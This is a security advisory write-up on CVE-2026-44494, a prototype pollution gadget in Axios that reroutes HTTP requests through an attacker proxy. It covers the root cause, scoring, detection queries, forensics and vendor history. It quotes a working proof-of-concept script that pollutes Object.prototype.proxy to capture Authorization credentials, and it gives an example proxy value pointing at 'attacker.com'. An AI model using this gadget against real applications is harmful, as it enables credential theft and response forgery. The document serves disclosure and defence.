Introduction
A prototype pollution gadget in Axios, the JavaScript ecosystem's most popular HTTP client library, allows any Object.prototype pollution present in an application's dependency tree to be silently escalated into a full Man-in-the-Middle attack, capturing authentication credentials and modifying HTTP responses without any direct user interaction. With over 100 million weekly npm downloads and roughly 174,000 dependent packages, the blast radius of CVE-2026-44494 spans virtually every corner of the Node.js ecosystem, and it arrives in the wake of a confirmed supply chain compromise of the same library just two months earlier.
Technical Information
Root Cause: Unguarded Prototype Chain Traversal on config.proxy
CVE-2026-44494 is classified under two CWEs: CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes) and CWE-441 (Unintended Proxy or Intermediary). This dual classification reflects the two stage nature of the attack: prototype pollution provides the injection vector, and Axios's HTTP adapter provides the gadget that converts that injection into network traffic hijacking.
The vulnerability resides in Axios's Node.js HTTP adapter at lib/adapters/http.js, specifically around line 670. When Axios prepares an outbound HTTP request, it reads config.proxy using standard JavaScript property access. In JavaScript, if an object does not have an "own" property with a given name, the runtime walks up the prototype chain looking for it. This is the fundamental behavior that prototype pollution exploits.
The critical detail is that proxy is not defined in Axios's defaults file (lib/defaults/index.js). When mergeConfig runs to combine user supplied configuration with Axios defaults, it uses Object.keys() to enumerate properties. Since proxy is never present in the defaults object, defaultToConfig2 for proxy is never executed, and the merged configuration object never receives an own proxy property. This means that when config.proxy is later accessed in the HTTP adapter, the lookup traverses the prototype chain. If an attacker has polluted Object.prototype.proxy with a value like {host: "attacker.com", port: 8080, protocol: "http"}, that value is found and treated as a legitimate proxy configuration.
The setProxy() function (lines 191 through 239 of http.js) then rewrites options.hostname and options.port to the attacker controlled values, routing the entire HTTP request through the attacker's proxy server. The attacker can intercept all request data including Authorization headers, cookies, and request bodies, and can return arbitrary forged responses.
The Two Stage Attack Chain
Stage 1: Prototype Pollution Source. The attacker exploits a prototype pollution vulnerability in any dependency within the target application's dependency tree. Common candidates include libraries like qs, lodash, or minimist that parse user controlled input into objects. The attacker pollutes Object.prototype.proxy with a malicious proxy configuration object.
Stage 2: Axios Gadget Activation. When the application makes any HTTP request using Axios, the HTTP adapter reads config.proxy, traverses the prototype chain, finds the attacker injected value, and calls setProxy(). All subsequent HTTP requests are routed through the attacker's proxy. No direct user input to Axios is required; the gadget fires automatically on every request.
Why This Bypasses the Prior Fix (v1.15.0)
An earlier prototype pollution gadget in Axios (GHSA-fvcv-3m26-pcqx) targeted the transformResponse code path and was patched in v1.15.0. That fix did not cover config.proxy because proxy is absent from the defaults file and was therefore never included in the mergeConfig enumeration. CVE-2026-44494 exploits this entirely different, unprotected code path.
CVSS Scoring and Dispute
The official GitHub Advisory rates this vulnerability at CVSS 8.7 (High) with vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N. The vulnerability finder rated it at CVSS 9.4 (Critical) with AC:L instead of AC:H, arguing that once any prototype pollution source exists in the dependency tree, exploitation is trivial. Both scores agree on the severe confidentiality and integrity impact: full interception and modification of all HTTP traffic including authentication credentials. Organizations should be aware of this scoring variance and not under prioritize based solely on the 8.7 rating.
| Parameter | Value |
|---|---|
| Attack Vector | Network (AV:N) |
| Attack Complexity | High (AC:H) per official score; Low (AC:L) per finder |
| Privileges Required | None (PR:N) |
| User Interaction | None (UI:N) |
| Scope | Changed (S:C) |
| Confidentiality Impact | High (C:H) |
| Integrity Impact | High (I:H) |
| Availability Impact | None (A:N) |
Proof of Concept
A verified, publicly available proof of concept is published directly within the official GitHub Security Advisory GHSA-35jp-ww65-95wh, authored by the Axios maintainer (jasonsaayman) and credited to reporter August829. The PoC is a self contained Node.js script that sets up an attacker proxy server, a real target server, pollutes the prototype, and demonstrates credential interception:
import http from 'http'; import axios from './index.js'; // Attacker's proxy server const intercepted = []; const proxyServer = http.createServer((req, res) => { intercepted.push({ url: req.url, authorization: req.headers.authorization, headers: req.headers, }); res.writeHead(200, { 'Content-Type': 'application/json' }); res.end('{"hijacked":true}'); }); await new Promise(r => proxyServer.listen(0, r)); const proxyPort = proxyServer.address().port; // Real target server const realServer = http.createServer((req, res) => { res.writeHead(200); res.end('{"data":"real"}'); }); await new Promise(r => realServer.listen(0, r)); const realPort = realServer.address().port; // Prototype pollution Object.prototype.proxy = { host: '127.0.0.1', port: proxyPort, protocol: 'http' }; // "Safe" request — goes through attacker's proxy const resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, { auth: { username: 'admin', password: 'SuperSecret123!' } }); console.log('Response from:', resp.data.hijacked ? 'ATTACKER PROXY' : 'real server'); console.log('Intercepted Authorization:', intercepted[0]?.authorization); // Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!) delete Object.prototype.proxy; realServer.close(); proxyServer.close();
The advisory provides verified output demonstrating the exploit's success:
- Before pollution, requests reach the real server normally.
- After
Object.prototype.proxyis set to the attacker's address, the same code and URL causes the request to be routed through the attacker's proxy. - The attacker's proxy captures the full URL (
http://127.0.0.1:<port>/api/secrets), theAuthorizationheader (Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh), and all other headers. - The attacker can return arbitrary forged responses (e.g.,
{"data":"from-attacker-proxy","hijacked":true}).
The gadget requires zero direct user input to Axios. Any separate prototype pollution vulnerability in the application's dependency tree (e.g., in qs, minimist, lodash) is sufficient to trigger the MITM condition across all Axios HTTP requests.
Detection Methods
Detecting CVE-2026-44494 requires a layered approach combining static dependency analysis, runtime behavioral monitoring, and network level anomaly detection.
Software Composition Analysis and Dependency Scanning
The GitHub Advisory Database has published advisory GHSA-35jp-ww65-95wh, which is directly mapped to CVE-2026-44494. Any tool that consumes GitHub's advisory feed, including GitHub Dependabot, will automatically flag vulnerable Axios versions. The affected version range is >= 1.0.0, < 1.16.0, with Snyk additionally tracking < 0.32.0 for the 0.x branch under identifier SNYK-JS-AXIOS-17111079. Tenable's vulnerability database also tracks this CVE for enterprise vulnerability management platforms.
For immediate local detection, run npm audit --json and filter the output for GHSA-35jp-ww65-95wh. Additionally, npm ls axios --all will display every path through which Axios is pulled into your dependency tree, helping identify hidden transitive inclusions.
Runtime Prototype Pollution Detection
Because CVE-2026-44494 is a prototype pollution gadget that weaponizes pollution sourced from elsewhere in the dependency tree, runtime detection requires checking whether Object.prototype has been tampered with. The key runtime indicator of compromise is the presence of a proxy property on Object.prototype containing host, port, and/or protocol sub properties. If Object.prototype.proxy is defined in your Node.js runtime when your application has not explicitly set it, this is a strong signal that prototype pollution has occurred and the Axios gadget may be active.
Node.js heap snapshots (taken via the --inspect flag) can reveal unexpected properties on Object.prototype. This is a powerful forensic technique for post incident analysis or proactive hunting.
Network Level Behavioral Detection
When the gadget fires, the observable network behavior is distinctive: all Axios initiated HTTP/HTTPS requests begin routing through an attacker controlled proxy. This produces several detectable artifacts:
- HTTP CONNECT method requests appearing in egress logs to destinations not on your approved proxy allowlist.
- TLS SNI hostname mismatches: the SNI value in the TLS ClientHello will reference the legitimate target hostname, but the TCP connection will resolve to a different IP (the attacker's proxy). NGFW and outbound TLS inspection logs can surface this discrepancy.
- Axios User Agent strings paired with unexpected proxy hop headers in forward proxy or WAF logs. Look for the
axios/<version>User Agent making requests through proxy infrastructure you do not control.
For SIEM environments, filter outbound HTTP requests where proxy_host is non null and not in your approved proxy list AND user_agent contains axios. The TechJack Solutions intelligence report published a validated Microsoft Sentinel KQL query targeting MITRE ATT&CK technique T1071 (Application Layer Protocol):
DeviceNetworkEvents | where Timestamp > ago(7d) | where RemotePort in (80, 443, 8080, 8443) | where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "teams.exe", "outlook.exe", "svchost.exe") | summarize Connections = count() by DeviceName, RemoteIP, InitiatingProcessFileName | where Connections > 50 | sort by Connections desc
This query hunts for unusual outbound connection patterns from non browser processes, serving as a behavioral proxy for the kind of anomalous traffic the proxy gadget would produce.
Key Forensic Artifacts
If you suspect exploitation has occurred, preserve and investigate:
- Node.js application stdout/stderr logs for the exposure window, filtering on strings like
proxy,httpsProxy,__proto__, orconstructor.prototype. - NGFW/WAF outbound connection logs filtered for HTTP CONNECT method requests and TCP sessions where the Host header destination diverges from the TCP destination IP.
- Node.js process environment dumps (
/proc/<pid>/environ) which may reveal injectedHTTP_PROXYorHTTPS_PROXYenvironment variables, andss -tnpconnection state snapshots showing active connections to unexpected IPs. - package-lock.json and yarn.lock snapshots establishing which Axios version was deployed, to confirm the exposure window.
MITRE ATT&CK Mapping
This vulnerability maps to three ATT&CK techniques: T1557 (Adversary in the Middle, via the proxy gadget), T1040 (Network Sniffing, for credential capture on redirected sessions), and T1071.001 (Application Layer Protocol: Web Protocols, for the C2 like communication pattern).
As of this writing, no publicly available Sigma rules, YARA rules, Snort signatures, or Suricata rules have been published specifically for CVE-2026-44494. Detection remains primarily version based (via SCA tooling) and behavioral (via network and runtime monitoring).
Affected Systems and Versions
The advisory states the affected range as Axios versions >= 1.0.0 and < 1.16.0. The description text in the advisory broadens this to "All versions (v0.x through v1.x including v1.15.0)." Snyk tracks the 0.x branch as affected for versions < 0.32.0 under identifier SNYK-JS-AXIOS-17111079.
The fixed version is Axios 1.16.0.
The vulnerability specifically affects the Node.js HTTP adapter (lib/adapters/http.js). Browser environments using Axios's XHR adapter are not affected by this particular gadget, as the browser adapter does not use the setProxy() code path.
Vendor Security History
Axios has experienced a concentrated series of security events in 2026, revealing a pattern of systemic weakness in how the library handles configuration objects:
| Event | Date | Description |
|---|---|---|
| GHSA-fvcv-3m26-pcqx (transformResponse gadget) | Pre May 2026 | First prototype pollution gadget in Axios, patched in v1.15.0 |
| Supply chain attack | March 30, 2026 | Attacker hijacked lead maintainer's npm account; published malicious versions 1.14.1 and 0.30.4 with a cross platform RAT |
| CVE-2026-40175 | April 2026 | CVSS 10.0 prototype pollution vulnerability, rated critical but deemed not practically exploitable in real Node.js environments by Aikido |
| CVE-2026-44494 (this advisory) | May 29, 2026 | config.proxy prototype pollution gadget enabling full MITM, patched in v1.16.0 |
| CVE-2026-44495 | May 29, 2026 | Separate prototype pollution gadget in HTTP adapter enabling arbitrary HTTP header injection |
| CVE-2026-42264 | Published subsequently | Prototype pollution read side gadgets in HTTP adapter allowing credential injection and request hijacking |
The supply chain attack on March 30, 2026 is particularly significant. An attacker hijacked the lead maintainer's npm credentials and published two malicious versions ([email protected] and [email protected]) across both the 1.x and legacy 0.x release branches. These versions contained a cross platform remote access trojan. Trend Micro telemetry indicated the campaign impacted hundreds of devices before the malicious packages were removed from npm. Microsoft, Snyk, Huntress, Orca Security, and JFrog all published independent analyses of the compromise.
The recurring pattern of prototype pollution gadgets suggests that other unprotected code paths may exist in the Axios configuration handling logic. The Singapore Cyber Security Agency (CSA) issued a critical alert specifically for the Axios vulnerability, reflecting the systemic concern around this library's security posture.
References
- CVE-2026-44494 NVD Detail
- CVE-2026-44494 CVE Record
- GitHub Advisory GHSA-35jp-ww65-95wh (Official)
- GitHub Advisory Database Entry
- GitLab Advisory for CVE-2026-44494
- Tenable CVE-2026-44494
- Snyk Vulnerability SNYK-JS-AXIOS-17111079
- Snyk Axios Package Security
- Axios Security Advisories Page
- Axios 1.16.0 Patch Commit
- TechJack Solutions Intelligence Report
- CSA Singapore Critical Alert AL-2026-037
- Trend Micro: Axios NPM Package Compromised
- Microsoft: Mitigating the Axios npm Supply Chain Compromise
- Snyk: Axios npm Package Compromised
- Orca Security: Axios Supply Chain Attack Analysis
- HeroDevs: Axios Versions, CVEs, and Safe Upgrade Path
- Aikido: Axios CVE-2026-40175 Analysis
- CVE-2026-44495 Header Injection Advisory



